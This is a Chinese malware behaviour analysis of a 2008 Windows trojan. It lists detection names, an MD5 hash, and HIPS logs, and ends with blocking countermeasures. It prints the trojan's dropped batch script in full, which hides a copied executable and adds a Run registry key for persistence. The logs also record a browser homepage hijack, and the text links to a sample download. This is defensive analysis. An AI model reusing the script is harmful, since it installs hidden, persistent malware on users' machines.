行为分析 Generic.Malware.SCsp.2C99A774

病毒名称:BitDefender:Generic.Malware.SCsp.2C99A774
            Kaspersky:-
            NOD32v2:probably unknown NewHeur_PE
            Rising:Trojan.Win32.VB.zva
VT扫描时间:09.29.2008 19:47:35 (CET)
EQS Lab编号:080930109
EQS Lab地址: [url]http://hi.baidu.com/eqsyssecurity[/url]
病毒大小:28.0 KB (28,672 字节)
MD5码:F85362B22F5AC46B9674DA2FEBB5D631
病毒类型: 特洛伊木马
主要传播方式: 网络
测试平台: WinXP SP3系统 (默认Shell为BBlean)    EQSecurity(HIPS) 实机
危害程度:★★★☆☆

病毒行为:

运行后向所在目录释放BAT并调用
2008-09-30 20:35:27 运行应用程序   
进程路径:F:\Once\15\15.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c F:\Once\15\Dx.bat
触发规则:高优先规则->In Side->%windir%\system32\cmd.exe

BAT内容:
@ECHO off
color 0A
copy 15.exe c:\notoped.exe >nul
attrib +r +s +h c:\notoped.exe >nul
@REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
del %0
将自身复制到C:\notoped.exe
2008-09-30 20:35:27 创建文件   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\notoped.exe
触发规则:所有程序规则->文件阻止及保护->?:\*.exe
创建txt
2008-09-30 20:35:40 创建文件   
进程路径:F:\Once\15\15.exe
文件路径:C:\text.txt
触发规则:所有程序规则->文件夹保护->C:\*
添加附加属性
2008-09-30 20:36:19 运行应用程序   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:+r +s +h c:\notoped.exe
触发规则:所有程序规则->系统工具->%windir%\system32\attrib.exe
添加启动项
2008-09-30 20:36:31 运行应用程序   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
触发规则:所有程序规则->系统工具->%windir%\system32\reg.exe
创建快捷方式
2008-09-30 20:36:44 创建文件   
进程路径:F:\Once\15\15.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Internet Explorer.lnk
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*\桌面\*
修改主页
2008-09-30 20:36:57 修改注册表内容   
进程路径:F:\Once\15\15.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Start Page
更改后: [url]http://www.dxcpm.com/?44_20080930[/url]
更改前: [url]http://www.shendu.com/[/url]
触发规则:所有程序规则->IE浏览器相关->*\Software\Microsoft\Internet explorer\Main
联网行为:




关键行为:

调用CMD

向C:\创建exe



HIPS防范对策:


阻止陌生程序调用CMD   attrib.exe

阻止陌生程序向C:\创建exe

阻止陌生程序修改首页
样本下载:[url]http://bbs.janmeng.com/thread-803714-1-1.html[/url]

你可能感兴趣的:(职场,休闲)